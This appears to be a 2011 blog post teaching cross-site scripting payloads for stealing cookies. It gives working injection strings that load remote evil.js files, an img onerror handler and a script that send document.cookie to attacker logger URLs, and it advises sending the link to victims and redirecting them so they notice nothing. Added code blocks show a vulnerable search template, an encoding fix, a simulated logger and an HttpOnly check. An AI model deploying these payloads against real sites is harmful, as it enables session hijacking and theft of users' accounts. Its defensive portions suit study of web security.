
Thursday, March 3, 2011

XSS Explained

Here I will go through a few different XSS payload syntaxes, explain why each one works, and show how they are used to steal cookies.

a)
<script src=http://site.com/evil.js></script>

This works because the vulnerable page inserts attacker-supplied input into its HTML without encoding it, so the browser parses the input as markup. The <script src=""> tag makes the browser fetch a pre-made JavaScript file from a remote server and execute it in the context of the vulnerable page, with access to that page's DOM and its cookies.

b)
'"/><script src=http://site.com/evil.js></script>

This is what I mostly use to break out of input fields on a website. Say I search for "test" and the results page shows "test" again inside the search box: the search term is being reflected into the value="" attribute of an <input> tag. The leading single and double quote end whichever kind of quoted attribute value the input landed in, /> closes the tag, and the script tag that follows is then parsed as a new element instead of as part of the attribute.
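The reflection described above, as an added example that is not part of the original post: a deliberately vulnerable search page template that pastes the query straight into the value="" attribute, the same template with HTML encoding applied, and a check showing that payload (b) yields a new script element in the first case but not the second. The page layout, the function names and the search term are assumptions made for illustration.

```javascript
// Added example (not from the original post): how the "test" search term is
// reflected into the search box, and why payload (b) breaks out of it.
// The page template and function names are assumptions for illustration.

// Vulnerable server-side template: the query is pasted straight into the
// value="" attribute and the results line with no encoding.
function renderSearchVulnerable(q) {
  return '<form action="/search">' +
         '<input type="text" name="q" value="' + q + '">' +
         '</form><p>Results for ' + q + '</p>';
}

// HTML-encode the five characters that can terminate an attribute value or
// start a tag. Enough for text and quoted-attribute contexts.
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, function (c) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
  });
}

// Hardened template: same layout, every reflection point encoded.
function renderSearchSafe(q) {
  var e = encodeHtml(q);
  return '<form action="/search">' +
         '<input type="text" name="q" value="' + e + '">' +
         '</form><p>Results for ' + e + '</p>';
}

// Crude check for whether the reflected input produced a new <script> tag,
// which is what the browser's HTML parser would see. Not a full parser; it is
// enough to show the difference between the two templates.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Payload (b) from the post: the quotes end whatever attribute value we are
// in, "/>" closes the tag, then a new script element is started.
var payload = '\'"/><script src=http://site.com/evil.js></script>';

console.log(renderSearchVulnerable(payload));
console.log(renderSearchSafe(payload));
```

Searching for a harmless term like "test" renders the same in both templates; only the encoded template survives the payload, because the quote and angle-bracket characters come out as entities that the parser treats as text.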

c)
<img src=xss.png onerror="document.location='http://site.com/log.php?cookie='+document.cookie">

This tag points at an image named "xss.png" that does not exist, so the load fails and the browser fires the onerror handler. The handler redirects the victim to the logger with their cookie appended to the query string. This variant is useful where the word "script" is filtered out of the input but event handler attributes are not.

d)
<script>document.location="http://sitea.com/log.php?c="+document.cookie+"&redirect=http://siteb.com";</script>

This is the most basic JavaScript for a cookie stealing attempt. It is the sort of code that would be placed inside the evil.js file retrieved from the remote server in (a) and (b), without the <script> tags, since a .js file is already script.

This script will redirect the webpage to http://sitea.com/log.php?c=[THEIR COOKIE]&redirect=http://siteb.com

The GET variable c contains the victim's cookie from the vulnerable page. The redirect part is just another GET variable that the logger uses to send them away to another website, so that they do not notice anything TOO strange. The best way to avoid suspicion is to redirect them back to the same site, just a different page.

Breakdown of the JavaScript if you didn't already know it: document.location is not a function but a property holding the page's Location object; assigning a string to it (document.location="...";) makes the browser navigate to that URL. document.cookie is a string property containing the cookies the browser holds for the current page, in the form name=value; name2=value2. Cookies set with the HttpOnly flag are left out of it, which is why that flag belongs on session cookies. Most of the page is reachable through document.* properties like these.
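Both sides of the exchange in (d), as an added example that is not part of the original post: the browser side builds the logger URL (with encodeURIComponent so that the = and ; characters inside the cookie string are not mistaken for query syntax), the logger side records the cookie and answers with the redirect, and a helper shows which cookies document.cookie would have exposed in the first place given the site's Set-Cookie headers. It is simulated in Node so it runs offline; document.cookie is passed in as a string, and the cookie values, the logger URL and the redirect target are constructed for illustration.

```javascript
// Added example (not from the original post): both sides of the exfiltration
// in payload (d), simulated in Node so it runs offline. The cookie string,
// the logger host and the redirect target are constructed for illustration.

// The browser side. document.cookie is taken as a parameter because there
// is no DOM here; in a real page it is the victim's cookie string.
function buildExfilUrl(cookieString, loggerBase, redirectTo) {
  // encodeURIComponent keeps '=', ';', '&' and '#' inside the cookie from
  // being read as query syntax by the logger.
  return loggerBase + '?c=' + encodeURIComponent(cookieString) +
         '&redirect=' + encodeURIComponent(redirectTo);
}

// The attacker's logger (the role log.php plays in the post): record the
// cookie and answer with a redirect so the victim lands on a normal page.
function handleLogRequest(requestUrl, log) {
  var u = new URL(requestUrl);
  var cookie = u.searchParams.get('c');      // decoded back to the raw string
  var redirect = u.searchParams.get('redirect') || '/';
  if (cookie !== null) log.push(cookie);
  return { status: 302, location: redirect };
}

// Which cookies would document.cookie have shown in the first place?
// Given the Set-Cookie headers the site sent, script can read only the
// ones without HttpOnly. This is the check a defender wants to run.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter(function (h) { return !/;\s*HttpOnly\b/i.test(h); })
    .map(function (h) { return h.split(';')[0].trim(); })
    .join('; ');
}

// Constructed sample: a session cookie that is HttpOnly and a preference
// cookie that is not.
var setCookieHeaders = [
  'PHPSESSID=4f3c9a1b; Path=/; HttpOnly',
  'theme=dark; Path=/'
];

var visible = scriptVisibleCookies(setCookieHeaders);
var url = buildExfilUrl(visible, 'http://sitea.com/log.php', 'http://siteb.com');
var log = [];
var response = handleLogRequest(url, log);
console.log(url, log, response);
```

With the sample headers above the logger only ever receives theme=dark: the session cookie carries HttpOnly and never appears in document.cookie, which is exactly the defensive effect the flag is meant to have.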

After that, all that is pretty much left to do is send the victim a link to the vulnerable URL with the payload in it, wait for them to click it, and watch the logger for cookies. Keep in mind that the payload usually has to be URL-encoded inside that link so that the browser sends it intact.

